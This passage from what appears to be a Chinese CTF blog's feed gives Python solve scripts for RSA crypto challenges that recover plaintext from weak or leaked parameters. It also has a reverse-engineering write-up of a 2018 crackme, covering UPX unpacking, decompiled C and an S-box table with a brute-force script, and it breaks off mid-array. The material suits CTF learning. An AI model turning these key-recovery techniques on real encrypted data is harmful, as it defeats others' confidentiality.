class="line">gift = <span class="number">12255978148467209895405401462014060633654138661175100957121874362221982957915022396069673248235108357771688051303453363643967834593066030782680214462115370497967778055593927850150182758869847946921291057362002616022538712593775400754634332361618945061055025544419655001567836482206750906414655010614360056137481173664901476116870144816992211793902146834987166288769615612767704010592138813256140678199511291489394523989294805910740127557682458229594376211232977501267410539674224065875285801753027816046254818608535462445306054117075379711073762930279723764342988824053970592468109679774789092077979655857748513636834</span></span><br><span class="line">c = <span class="number">7357116532209949285136310518084676100522798730487701269950303460540634127932201594120600757671807456790592531487713433579926404640474277692592102315472760853853767347752080563508622523821339163225554653816787201616233932746815764392729597579461985789538131853246938443458331139199802764554726447278501492140335824365867574318693890007499638038064582031311613039571335453968072426153706431456149868515230310567240569544961967582304893471240728585336273245259533905230737876248875784828430507371662455796543123714325161987112223947057481814610592300979207673818538093532100233028106442070524965861451563388404227738574</span></span><br><span class="line"><span class="comment"># gift = 8 * 11 * 97 * 9601 * 26057167557433418766727399341516665922795024485718296827775927226598694152064298989740080209950805089159979564300359652085874056289167084685303669920341402021998569251561854184586912056788515477034039863935829715784489123437315798902409373317578932823488000322365526936227790036245092665207472438169954702748857842187299166976320465787901470261800372425345547560303561842376571751928531743505412746346436473024093575122041981043859827477404447458211341273671273506575488189374812217939984540494633634622813448773520886788206836310702581026986331011987344147901504555559723572981774237352245997308787165273589</span></span><br><span class="line"></span><br><span class="line">print(len(bin(gift)[<span class="number">2</span>:]))</span><br><span class="line">print(len(bin(n)[<span class="number">2</span>:]))</span><br><span class="line"></span><br><span class="line"><span class="comment"># gift * gcd = (p-1) * (q-1)</span></span><br><span class="line"><span class="comment"># gift % gcd = 0</span></span><br><span class="line"><span class="keyword">for</span> gcd_val <span class="keyword">in</span> range(<span class="number">4</span>, <span class="number">8</span>):</span><br><span class="line"> phi = gift * gcd_val</span><br><span class="line"> <span class="keyword">try</span>:</span><br><span class="line"> d = gmpy2.invert(e // <span class="number">2</span>, phi)</span><br><span class="line"> m_2 = pow(c, int(d), n)</span><br><span class="line"> flag = long_to_bytes(gmpy2.isqrt(m_2))</span><br><span class="line"> print(flag)</span><br><span class="line"> <span class="keyword">except</span> ZeroDivisionError:</span><br><span class="line"> <span class="keyword">continue</span></span><br></pre></td></tr></table></figure></div><p>后一部分</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="code"><pre><span class="line"><span class="keyword">import</span> gmpy2</span><br><span class="line"><span class="keyword">import</span> Crypto.Util.number</span><br><span class="line"><span class="keyword">import</span> sympy</span><br><span class="line">d = <span class="number">14519297697723031496224953772301033569165883208616356699837703756220717249229195213146695656923357394378868735444167631602696573904678412172248043414276910206086892084385988564720914312238316434518024995169814463252129242492227202678878240875905293369168263909256455159691392124769949072754243536472227070447391890140409479709945084894060833468804156778720190688101601664725009609222256314873780002770605127043596912060811904733471592387441742111474341938658516761896926403628885365926903655309306738689809023277824030268579979837642613499180913999651379232105756338399243024739524553588216117189742912479604441636257</span></span><br><span class="line"><span class="comment">#d = 14519297697723031496224953772301033569165883208616356699837703756220717249229195213146695656923357394378868735444167631602696573904678412172248043414276910206086892084385988564720914312238316434518024995169814463252129242492227202678878240875905293369168263909256455159691392124769949072754243536472227070447391890140409479709945084894060833468804156778720190688101601664725009609222256314873780002770605127043596912060811904733471592387441742111474341938658516761896926403628885365926903655309306738689809023277824030268579979837642613499180913999651379232105756338399243024739524553588216117189742912479604441636257</span></span><br><span class="line"><span class="comment">#c = 23574157314515030841894399693996910252287747536395985840285410194536546768646580704111053676040921830550019965767796038280932469005359270920519250763405535872475345625907947986452218739530197421244240070129909526493952916306821311836861766221812155261751444946282559677005557815746813525162411907545113665605490915464367483833005576787591204417525937745572210195816236947103271664048065491627347939268785403334419989160034526164012966888952162714736497312282011026789187871221751240709801544484784941178786820290118585681595783245449236394480319395321877182096839866054466492123200354772280398476167002177544154960579</span></span><br><span class="line">c = <span class="number">23574157314515030841894399693996910252287747536395985840285410194536546768646580704111053676040921830550019965767796038280932469005359270920519250763405535872475345625907947986452218739530197421244240070129909526493952916306821311836861766221812155261751444946282559677005557815746813525162411907545113665605490915464367483833005576787591204417525937745572210195816236947103271664048065491627347939268785403334419989160034526164012966888952162714736497312282011026789187871221751240709801544484784941178786820290118585681595783245449236394480319395321877182096839866054466492123200354772280398476167002177544154960579</span></span><br><span class="line">e = <span class="number">0x10001</span></span><br><span class="line"><span class="comment"># 有 c d e 我们知道e*d = 1 %(p-1)(q-1) 则e*d-1 = k* (p-1)*(q-1)</span></span><br><span class="line"><span class="comment"># 可以爆破k要得到(p-1)(q-1)</span></span><br><span class="line"><span class="comment">#取k的范围 ed - 1是2063到2064位 、 (p-1)(q-1)是1024+1024位 则k取2**15~2**16 </span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">1000</span>,<span class="number">3000</span>):</span><br><span class="line"> <span class="keyword">if</span> e*d<span class="number">-1</span> > <span class="number">2</span>**i <span class="keyword">and</span> e*d<span class="number">-1</span><<span class="number">2</span>**(i+<span class="number">1</span>):</span><br><span class="line"> print(i)</span><br><span class="line"> <span class="keyword">break</span></span><br><span class="line"> <span class="comment">#2063</span></span><br><span class="line"><span class="comment"># (e*d-1)对k的模为0</span></span><br><span class="line"><span class="comment"># 我们还知道q是p的下一个素数 俩者大小相差不大 </span></span><br><span class="line"><span class="keyword">for</span> k <span class="keyword">in</span> range(<span class="number">2</span>**<span class="number">14</span>,<span class="number">2</span>**<span class="number">16</span>):</span><br><span class="line"> <span class="keyword">if</span> (e*d<span class="number">-1</span>) % k==<span class="number">0</span>:</span><br><span class="line"> p = sympy.prevprime(gmpy2.iroot((e*d<span class="number">-1</span>)//k,<span class="number">2</span>)[<span class="number">0</span>]) </span><br><span class="line"> <span class="comment">#通过sympy.prevprime(n)得到小于n的最大素数 </span></span><br><span class="line"> <span class="comment">#gmpy2.iroot开方函数输出的是一个元组</span></span><br><span class="line"> q = gmpy2.next_prime(p)</span><br><span class="line"> <span class="comment"># print(q)</span></span><br><span class="line"> <span class="comment"># print(p)</span></span><br><span class="line"> <span class="keyword">if</span> (e*d<span class="number">-1</span>)//k == (q<span class="number">-1</span>)*(p<span class="number">-1</span>):</span><br><span class="line"> <span class="comment">#验证pq是否正确</span></span><br><span class="line"> <span class="keyword">break</span></span><br><span class="line">n = q * p</span><br><span class="line">print(n)</span><br><span class="line">m = pow(c ,d ,n )</span><br><span class="line"><span class="comment">#print(byte1s.fromhex(hex(m)[2:]))</span></span><br><span class="line"><span class="keyword">import</span> binascii</span><br><span class="line">print(binascii.unhexlify(hex(m)[<span class="number">2</span>:]))</span><br><span class="line"><span class="comment">#print(Crypto.Util.number.long_to_bytes(m))</span></span><br></pre></td></tr></table></figure></div><h3 id="Merry-Christmas"><a href="#Merry-Christmas" class="headerlink" title="Merry_Christmas"></a>Merry_Christmas</h3><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="code"><pre><span class="line"><span class="keyword">import</span> gmpy2</span><br><span class="line"><span class="keyword">from</span> gmpy2 <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> Crypto.Util.number <span class="keyword">import</span> *</span><br><span class="line">n=<span class="number">17539423546879883396629573776616418986256902147283732214295946312835113344061142956076117932720247053739715326040027048199629442201144987405090572982720131052885163184811793669071684926986445262835990861167700118224153436202178098707759605979066475651999711718728200184335695206586643579499656822346329750835696158561669170301767928780361376643304324731146650458384564533895090608529488304659924485356518526226061081943815971670656857778229528022465452008890430046982169571771039198877713729197033434033303723925335811353531172899520232033290866272195248554656110282928669639257994965701208856346298076998993772423097</span></span><br><span class="line">c=<span class="number">5560694632613114538708358450844738346732427106497566176686415566542021811907746171660858360055720615188679328728275250111979427060322426593068123630729075838980217642604281020733578019517061369665467249555496690538379316251258553434263030485822069081031041121329559075841297923650799241347196473466430248261213536319894271629049899379974582453405472218720572088937075254938460083046946717784821298765199164644879680847984441166684509290675197526982405556980540919856072198191306527746754844792294221564010770506298266272017613487725494001276623402987809305696759434595799863487759478902384039066714073292949058853003</span></span><br><span class="line">n1=<span class="number">21465819616864492551767155722996412718832402997933699784091937387760830726039866762857450959675228856561597024318920734312362144261628290737563681759442171285581931041622345778933572673367607809994811354957971820829401430301563611970709279094237597394734599103937206689348004861322161582747568764567491894069565665829828570957338594421227530701263883322496237907509301547209937444268813162260988374157151529111924866290775985684107622034449136081744171954609262107449388993051611516007232903948144186151363436032658716266030263647775582015141329829060294352706551807295555026827381280240539020513044515406829846588787</span></span><br><span class="line">c1=<span class="number">19585478304129650368934167685581947379018238627360258251578178648406399091655911309790559870365866290321783969820131014958701556570645863667895395615377725655139970869868226237575462206775170966585306390686724869174973947234608655786245191308423334769172394586099003865664934720651493266130413617892286830586179842568659758155132923079476873190047514962385696606866440573294836559927597496331643346032100075257329902065785369011323134807157288931237650262052445952481912276967263237183320639027956890814569212814115581834172475173790422964999583755677956698930811772293980516268488171908878145019531149798750799613142</span></span><br><span class="line">gift1=<span class="number">21073862899796816496314528055339279280335681203948249072101881208021752125789533267427994742277358208178070970462447090818216561770563907183494712376741842209323406667050344266668347773728401520981152006053958337605219297650281680615939792818684114311810254344598007357629176456353064311734075462353266893546853648829947081541158912147691654438830914577857503519080776224006347318623082457516638594584206488534978134212723395494600005197454325625290580653432901204502054226866606652982669196910942405139803194404497913820850500332680877820694279428529873469583387698995104411071804749202120283361058269192420218572231</span></span><br><span class="line">gift2=<span class="number">7634352822409241151514235360777296908269419654786551951076299092182838191720014827302929726661609788893676185300000003824161794580145215813570705896440007085639728197111313542046542236060921056046727832889041640187683808320443684484085665265794806366182119574554965179974119587542057100849953753232435527244682735108194058759240757296546820383552711669453408694460188770050594702462736564767783116432265746800810795602828775783509056534518928775187835786128676790426643882842096826044057116388930041087679950264956074503205229333151001519229166174531496272703271636344792947552939606533888390978361247276796123693665</span></span><br><span class="line"></span><br><span class="line">t1=pow(gift1,<span class="number">691</span>,n1)</span><br><span class="line">t2=pow(gift2,<span class="number">587</span>,n1)</span><br><span class="line">x1=t1-t2</span><br><span class="line">x2=t2-t1</span><br><span class="line">xx = gmpy2.gcd(x2,n1)</span><br><span class="line">p1=xx</span><br><span class="line"><span class="comment">#p1 = 111260936618891036068652208614496645952776413871721160526197362367054114767347494528257565447229196035984168278796498545668532710414950556409048002275825950676900234517459096095264009412617416429176073580216701699837149712564123810225413587649986801062654943062839747848949602864178056960224292368694023834399</span></span><br><span class="line">e1 = <span class="number">979691</span></span><br><span class="line">q1 = n1//p1</span><br><span class="line">p1 = mpz(p1)</span><br><span class="line">q1 = mpz(q1)</span><br><span class="line">e1 = mpz(e1)</span><br><span class="line">phi1 = (q1<span class="number">-1</span>) * (p1<span class="number">-1</span>) </span><br><span class="line">d1 = gmpy2.invert(e1, phi1)</span><br><span class="line">p = pow(c1,d1,n1)</span><br><span class="line">print(p)</span><br><span class="line"></span><br><span class="line">q = n//p</span><br><span class="line"><span class="comment">#print(isPrime(p))</span></span><br><span class="line"><span class="comment">#print(isPrime(q))</span></span><br><span class="line">e = <span class="number">65537</span></span><br><span class="line">p = mpz(p)</span><br><span class="line">q = mpz(q)</span><br><span class="line">e = mpz(e)</span><br><span class="line">phi = (p - <span class="number">1</span>) * (q - <span class="number">1</span>)</span><br><span class="line">d = gmpy2.invert(e, phi)</span><br><span class="line">m = pow(c,d,n)</span><br><span class="line"></span><br><span class="line">print(long_to_bytes(m))</span><br></pre></td></tr></table></figure></div>]]></content>
<summary type="html">
<h2 id="岁末赛"><a href="#岁末赛" class="headerlink" title="岁末赛"></a>岁末赛</h2>
</summary>
<category term="CTF" scheme="https://github.com/gha01un/gha01un.github.io/categories/CTF/"/>
<category term="RE" scheme="https://github.com/gha01un/gha01un.github.io/tags/RE/"/>
</entry>
<entry>
<title>Replace</title>
<link href="https://github.com/gha01un/gha01un.github.io/2020/12/18/Replace/"/>
<id>https://github.com/gha01un/gha01un.github.io/2020/12/18/Replace/</id>
<published>2020-12-18T10:04:36.674Z</published>
<updated>2021-01-11T01:42:35.049Z</updated>
<content type="html"><![CDATA[<h3 id="2018湘湖杯逆向题"><a href="#2018湘湖杯逆向题" class="headerlink" title="2018湘湖杯逆向题"></a>2018湘湖杯逆向题</h3><a id="more"></a><p>首先先查看文件</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/18/RZiQLXduOGplEB3.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>upx壳,32位文件,于是拖入kali下手动脱壳。</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/18/opgYmX1bihZWRqB.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>把已经脱壳的文件拖入ida中查看,反编译</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/18/98FJxWmIcuthzaZ.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>里面有个重点输入buf必须是35长度<br>进入sub_401090函数看看</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="C"><figure class="iseeu highlight /c"><table><tr><td class="code"><pre><span class="line"><span class="function"><span class="keyword">signed</span> <span class="keyword">int</span> __fastcall <span class="title">sub_401090</span><span class="params">(<span class="keyword">int</span> a1, <span class="keyword">int</span> a2)</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"> <span class="keyword">int</span> v2; <span class="comment">// ebx</span></span><br><span class="line"> <span class="keyword">int</span> v4; <span class="comment">// edx</span></span><br><span class="line"> <span class="keyword">char</span> v5; <span class="comment">// al</span></span><br><span class="line"> <span class="keyword">int</span> v6; <span class="comment">// esi</span></span><br><span class="line"> <span class="keyword">int</span> v7; <span class="comment">// edi</span></span><br><span class="line"> <span class="keyword">char</span> v8; <span class="comment">// al</span></span><br><span class="line"> <span class="keyword">int</span> v9; <span class="comment">// eax</span></span><br><span class="line"> <span class="keyword">char</span> v10; <span class="comment">// cl</span></span><br><span class="line"> <span class="keyword">int</span> v11; <span class="comment">// eax</span></span><br><span class="line"> <span class="keyword">int</span> v12; <span class="comment">// ecx</span></span><br><span class="line"></span><br><span class="line"> v2 = a1;</span><br><span class="line"> <span class="keyword">if</span> ( a2 != <span class="number">35</span> )</span><br><span class="line"> <span class="keyword">return</span> <span class="number">-1</span>;</span><br><span class="line"> v4 = <span class="number">0</span>;</span><br><span class="line"> <span class="keyword">while</span> ( <span class="number">1</span> )</span><br><span class="line"> {</span><br><span class="line"> v5 = *(_BYTE *)(v4 + v2);</span><br><span class="line"> v6 = (v5 >> <span class="number">4</span>) % <span class="number">16</span>;</span><br><span class="line"> v7 = (<span class="number">16</span> * v5 >> <span class="number">4</span>) % <span class="number">16</span>;</span><br><span class="line"> v8 = byte_402150[<span class="number">2</span> * v4];</span><br><span class="line"> <span class="keyword">if</span> ( v8 < <span class="number">48</span> || v8 > <span class="number">57</span> )</span><br><span class="line"> v9 = v8 - <span class="number">87</span>;</span><br><span class="line"> <span class="keyword">else</span></span><br><span class="line"> v9 = v8 - <span class="number">48</span>;</span><br><span class="line"> v10 = byte_402151[<span class="number">2</span> * v4];</span><br><span class="line"> v11 = <span class="number">16</span> * v9;</span><br><span class="line"> <span class="keyword">if</span> ( v10 < <span class="number">48</span> || v10 > <span class="number">57</span> )</span><br><span class="line"> v12 = v10 - <span class="number">87</span>;</span><br><span class="line"> <span class="keyword">else</span></span><br><span class="line"> v12 = v10 - <span class="number">48</span>;</span><br><span class="line"> <span class="keyword">if</span> ( (<span class="keyword">unsigned</span> __int8)byte_4021A0[<span class="number">16</span> * v6 + v7] != ((v11 + v12) ^ <span class="number">0x19</span>) )</span><br><span class="line"> <span class="keyword">break</span>;</span><br><span class="line"> <span class="keyword">if</span> ( ++v4 >= <span class="number">35</span> )</span><br><span class="line"> <span class="keyword">return</span> <span class="number">1</span>;</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">return</span> <span class="number">-1</span>;</span><br><span class="line">}</span><br></pre></td></tr></table></figure></div><p>需要这个函数返回1 那肯定是要完成</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="C"><figure class="iseeu highlight /c"><table><tr><td class="code"><pre><span class="line"><span class="keyword">if</span> ( ++v4 >= <span class="number">35</span> )</span><br><span class="line"><span class="keyword">return</span> <span class="number">1</span>;</span><br></pre></td></tr></table></figure></div><p>那看看上面的函数逻辑 <code>v5 = *(_BYTE *)(v4 + v2);</code></p><p>v2被a1赋值,a1就是我们输入的buf</p><p> v4从0开始每次循环+1<br>接着看一下下面<code>v6 = (v5 >> 4) % 16;</code> v6=(输入的每个字符/16)%16<br><code>v7 = (16 * v5 >> 4) % 16;</code></p><p><code>v7= v5%16</code></p><p><code>v8 = unk_402150[2 * v4];</code></p><p> v8为一个数组中2<em>v4的变量 我们暂且叫这个数组为arr1 v8=arr1[2</em>v4]</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="C"><figure class="iseeu highlight /c"><table><tr><td class="code"><pre><span class="line"><span class="keyword">if</span> ( v8 < <span class="number">48</span> || v8 > <span class="number">57</span> )</span><br><span class="line"> v9 = v8 - <span class="number">87</span>;</span><br><span class="line"><span class="keyword">else</span></span><br><span class="line"> v9 = v8 - <span class="number">48</span>;</span><br></pre></td></tr></table></figure></div><p>这一段是判断v8去对v9进行操作<br><code>v10 = byte_402151[2 * v4];</code>v10等于另外一个数组的2<em>v4个元素 我们暂且叫这个数组为arr2 v10 = arr2[2</em>v4]</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="code"><pre><span class="line">if ( v10 < 48 || v10 > 57 )</span><br><span class="line"> v12 = v10 - 87;</span><br><span class="line">else</span><br><span class="line"> v12 = v10 - 48;</span><br></pre></td></tr></table></figure></div><p>下面就是一个重点 这是整个代码的关键所在 在byte_4021A0这个数组中的16<em>v6+v7的位置上的字符 需要和v11+v12对0x19的异或值相等才可以<br>简洁而写就是</em>byte_4021A0[16*v6+v7] == (v11+v12)^0x19</p><p>整理了所有逻辑后我们就去思维逆回去 我们需要有一个字符串 长度必须是35 而且字符串中每一个都在<code>if ( (unsigned __int8)byte_4021A0[16 * v6 + v7] != ((v11 + v12) ^ 0x19) )</code><br>可以跳过 那可以想象得到 估计这个就是flag字符串了 那我们怎么得到这个字符串呢 最简单方法 爆破 从所有可见字符一个一个试试 看到哪一个成立就行 先看一下<code>byte_4021A0</code>,<code>byte_402151</code> 和 <code>byte_402150</code><br>数组中存的都是什么</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/18/toNfHISLRenq6KJ.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>可以看的出来<code>byte_402151</code> 和 <code>byte_402150</code>是连着的 byte_402150存的是<code>2a49f69c38395cde96d6de96d6f4e025484954d6195448def6e2dad67786e21d5adae6</code><br>而byte_402151存的是 <code>a49f69c38395cde96d6de96d6f4e025484954d6195448def6e2dad67786e21d5adae6</code></p><p>shift+E提取出<code>byte_4021A0</code>的数据</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="C"><figure class="iseeu highlight /c"><table><tr><td class="code"><pre><span class="line"><span class="keyword">unsigned</span> <span class="keyword">char</span> ida_chars[] =</span><br><span class="line">{</span><br><span class="line"> <span class="number">0x63</span>, <span class="number">0x7C</span>, <span class="number">0x77</span>, <span class="number">0x7B</span>, <span class="number">0xF2</span>, <span class="number">0x6B</span>, <span class="number">0x6F</span>, <span class="number">0xC5</span>, <span class="number">0x30</span>, <span class="number">0x01</span>, </span><br><span class="line"> <span class="number">0x67</span>, <span class="number">0x2B</span>, <span class="number">0xFE</span>, <span class="number">0xD7</span>, <span class="number">0xAB</span>, <span class="number">0x76</span>, <span class="number">0xCA</span>, <span class="number">0x82</span>, <span class="number">0xC9</span>, <span class="number">0x7D</span>, </span><br><span class="line"> <span class="number">0xFA</span>, <span class="number">0x59</span>, <span class="number">0x47</span>, <span class="number">0xF0</span>, <span class="number">0xAD</span>, <span class="number">0xD4</span>, <span class="number">0xA2</span>, <span class="number">0xAF</span>, <span class="number">0x9C</span>, <span class="number">0xA4</span>, </span><br><span class="line"> <span class="number">0x72</span>, <span class="number">0xC0</span>, <span class="number">0xB7</span>, <span class="number">0xFD</span>, <span class="number">0x93</span>, <span class="number">0x26</span>, <span class="number">0x36</span>, <span class="number">0x3F</span>, <span class="number">0xF7</span>, <span class="number">0xCC</span>, </span><br><span class="line"> <span class="number">0x34</span>, <span class="number">0xA5</span>, <span class="number">0xE5</span>, <span class="number">0xF1</span>, <span class="number">0x71</span>, <span class="number">0xD8</span>, <span class="number">0x31</span>, <span class="number">0x15</span>, <span class="number">0x04</span>, <span class="number">0xC7</span>, </span><br><span class="line"> <span class="number">0x23</span>, <span class="number">0xC3</span>, <span class="number">0x18</span>, <span class="number">0x96</span>, <span class="number">0x05</span>, <span class="number">0x9A</span>, <span class="number">0x07</span>, <span class="number">0x12</span>, <span class="number">0x80</span>, <span class="number">0xE2</span>, </span><br><span class="line"> <span class="number">0xEB</span>, <span class="number">0x27</span>, <span class="number">0xB2</span>, <span class="number">0x75</span>, <span class="number">0x09</span>, <span class="number">0x83</span>, <span class="number">0x2C</span>, <span class="number">0x1A</span>, <span class="number">0x1B</span>, <span class="number">0x6E</span>, </span><br><span class="line"> <span class="number">0x5A</span>, <span class="number">0xA0</span>, <span class="number">0x52</span>, <span class="number">0x3B</span>, <span class="number">0xD6</span>, <span class="number">0xB3</span>, <span class="number">0x29</span>, <span class="number">0xE3</span>, <span class="number">0x2F</span>, <span class="number">0x84</span>, </span><br><span class="line"> <span class="number">0x53</span>, <span class="number">0xD1</span>, <span class="number">0x00</span>, <span class="number">0xED</span>, <span class="number">0x20</span>, <span class="number">0xFC</span>, <span class="number">0xB1</span>, <span class="number">0x5B</span>, <span class="number">0x6A</span>, <span class="number">0xCB</span>, </span><br><span class="line"> <span class="number">0xBE</span>, <span class="number">0x39</span>, <span class="number">0x4A</span>, <span class="number">0x4C</span>, <span class="number">0x58</span>, <span class="number">0xCF</span>, <span class="number">0xD0</span>, <span class="number">0xEF</span>, <span class="number">0xAA</span>, <span class="number">0xFB</span>, </span><br><span class="line"> <span class="number">0x43</span>, <span class="number">0x4D</span>, <span class="number">0x33</span>, <span class="number">0x85</span>, <span class="number">0x45</span>, <span class="number">0xF9</span>, <span class="number">0x02</span>, <span class="number">0x7F</span>, <span class="number">0x50</span>, <span class="number">0x3C</span>, </span><br><span class="line"> <span class="number">0x9F</span>, <span class="number">0xA8</span>, <span class="number">0x51</span>, <span class="number">0xA3</span>, <span class="number">0x40</span>, <span class="number">0x8F</span>, <span class="number">0x92</span>, <span class="number">0x9D</span>, <span class="number">0x38</span>, <span class="number">0xF5</span>, </span><br><span class="line"> <span class="number">0xBC</span>, <span class="number">0xB6</span>, <span class="number">0xDA</span>, <span class="number">0x21</span>, <span class="number">0x10</span>, <span class="number">0xFF</span>, <span class="number">0xF3</span>, <span class="number">0xD2</span>, <span class="number">0xCD</span>, <span class="number">0x0C</span>, </span><br><span class="line"> <span class="number">0x13</span>, <span class="number">0xEC</span>, <span class="number">0x5F</span>, <span class="number">0x97</span>, <span class="number">0x44</span>, <span class="number">0x17</span>, <span class="number">0xC4</span>, <span class="number">0xA7</span>, <span class="number">0x7E</span>, <span class="number">0x3D</span>, </span><br><span class="line"> <span class="number">0x64</span>, <span class="number">0x5D</span>, <span class="number">0x19</span>, <span class="number">0x73</span>, <span class="number">0x60</span>, <span class="number">0x81</span>, <span class="number">0x4F</span>, <span class="number">0xDC</span>, <span class="number">0x22</span>, <span class="number">0x2A</span>, </span><br><span class="line"> <span class="number">0x90</span>, <span class="number">0x88</span>, <span class="number">0x46</span>, <span class="number">0xEE</span>, <span class="number">0xB8</span>, <span class="number">0x14</span>, <span class="number">0xDE</span>, <span class="number">0x5E</span>, <span class="number">0x0B</span>, <span class="number">0xDB</span>, </span><br><span class="line"> <span class="number">0xE0</span>, <span class="number">0x32</span>, <span class="number">0x3A</span>, <span class="number">0x0A</span>, <span class="number">0x49</span>, <span class="number">0x06</span>, <span class="number">0x24</span>, <span class="number">0x5C</span>, <span class="number">0xC2</span>, <span class="number">0xD3</span>, </span><br><span class="line"> <span class="number">0xAC</span>, <span class="number">0x62</span>, <span class="number">0x91</span>, <span class="number">0x95</span>, <span class="number">0xE4</span>, <span class="number">0x79</span>, <span class="number">0xE7</span>, <span class="number">0xC8</span>, <span class="number">0x37</span>, <span class="number">0x6D</span>, </span><br><span class="line"> <span class="number">0x8D</span>, <span class="number">0xD5</span>, <span class="number">0x4E</span>, <span class="number">0xA9</span>, <span class="number">0x6C</span>, <span class="number">0x56</span>, <span class="number">0xF4</span>, <span class="number">0xEA</span>, <span class="number">0x65</span>, <span class="number">0x7A</span>, </span><br><span class="line"> <span class="number">0xAE</span>, <span class="number">0x08</span>, <span class="number">0xBA</span>, <span class="number">0x78</span>, <span class="number">0x25</span>, <span class="number">0x2E</span>, <span class="number">0x1C</span>, <span class="number">0xA6</span>, <span class="number">0xB4</span>, <span class="number">0xC6</span>, </span><br><span class="line"> <span class="number">0xE8</span>, <span class="number">0xDD</span>, <span class="number">0x74</span>, <span class="number">0x1F</span>, <span class="number">0x4B</span>, <span class="number">0xBD</span>, <span class="number">0x8B</span>, <span class="number">0x8A</span>, <span class="number">0x70</span>, <span class="number">0x3E</span>, </span><br><span class="line"> <span class="number">0xB5</span>, <span class="number">0x66</span>, <span class="number">0x48</span>, <span class="number">0x03</span>, <span class="number">0xF6</span>, <span class="number">0x0E</span>, <span class="number">0x61</span>, <span class="number">0x35</span>, <span class="number">0x57</span>, <span class="number">0xB9</span>, </span><br><span class="line"> <span class="number">0x86</span>, <span class="number">0xC1</span>, <span class="number">0x1D</span>, <span class="number">0x9E</span>, <span class="number">0xE1</span>, <span class="number">0xF8</span>, <span class="number">0x98</span>, <span class="number">0x11</span>, <span class="number">0x69</span>, <span class="number">0xD9</span>, </span><br><span class="line"> <span class="number">0x8E</span>, <span class="number">0x94</span>, <span class="number">0x9B</span>, <span class="number">0x1E</span>, <span class="number">0x87</span>, <span class="number">0xE9</span>, <span class="number">0xCE</span>, <span class="number">0x55</span>, <span class="number">0x28</span>, <span class="number">0xDF</span>, </span><br><span class="line"> <span class="number">0x8C</span>, <span class="number">0xA1</span>, <span class="number">0x89</span>, <span class="number">0x0D</span>, <span class="number">0xBF</span>, <span class="number">0xE6</span>, <span class="number">0x42</span>, <span class="number">0x68</span>, <span class="number">0x41</span>, <span class="number">0x99</span>, </span><br><span class="line"> <span class="number">0x2D</span>, <span class="number">0x0F</span>, <span class="number">0xB0</span>, <span class="number">0x54</span>, <span class="number">0xBB</span>, <span class="number">0x16</span></span><br><span class="line">};</span><br></pre></td></tr></table></figure></div><p>最后附上脚本</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="code"><pre><span class="line">table = [<span class="number">0x63</span>, <span class="number">0x7C</span>, <span class="number">0x77</span>, <span class="number">0x7B</span>, <span class="number">0xF2</span>, <span class="number">0x6B</span>, <span class="number">0x6F</span>, <span class="number">0xC5</span>, <span class="number">0x30</span>, <span class="number">0x01</span>,</span><br><span class="line"> <span class="number">0x67</span>, <span class="number">0x2B</span>, <span class="number">0xFE</span>, <span class="number">0xD7</span>, <span class="number">0xAB</span>, <span class="number">0x76</span>, <span class="number">0xCA</span>, <span class="number">0x82</span>, <span class="number">0xC9</span>, <span class="number">0x7D</span>,</span><br><span class="line"> <span class="number">0xFA</span>, <span class="number">0x59</span>, <span class="number">0x47</span>, <span class="number">0xF0</span>, <span class="number">0xAD</span>, <span class="number">0xD4</span>, <span class="number">0xA2</span>, <span class="number">0xAF</span>, <span class="number">0x9C</span>, <span class="number">0xA4</span>,</span><br><span class="line"> <span class="number">0x72</span>, <span class="number">0xC0</span>, <span class="number">0xB7</span>, <span class="number">0xFD</span>, <span class="number">0x93</span>, <span class="number">0x26</span>, <span class="number">0x36</span>, <span class="number">0x3F</span>, <span class="number">0xF7</span>, <span class="number">0xCC</span>,</span><br><span class="line"> <span class="number">0x34</span>, <span class="number">0xA5</span>, <span class="number">0xE5</span>, <span class="number">0xF1</span>, <span class="number">0x71</span>, <span class="number">0xD8</span>, <span class="number">0x31</span>, <span class="number">0x15</span>, <span class="number">0x04</span>, <span class="number">0xC7</span>,</span><br><span class="line"> <span class="number">0x23</span>, <span class="number">0xC3</span>, <span class="number">0x18</span>, <span class="number">0x96</span>, <span class="number">0x05</span>, <span class="number">0x9A</span>, <span class="number">0x07</span>, <span class="number">0x12</span>, <span class="number">0x80</span>, <span class="number">0xE2</span>,</span><br><span class="line"> <span class="number">0xEB</span>, <span class="number">0x27</span>, <span class="number">0xB2</span>, <span class="number">0x75</span>, <span class="number">0x09</span>, <span class="number">0x83</span>, <span class="number">0x2C</span>, <span class="number">0x1A</span>, <span class="number">0x1B</span>, <span class="number">0x6E</span>,</span><br><span class="line"> <span class="number">0x5A</span>, <span class="number">0xA0</span>, <span class="number">0x52</span>, <span class="number">0x3B</span>, <span 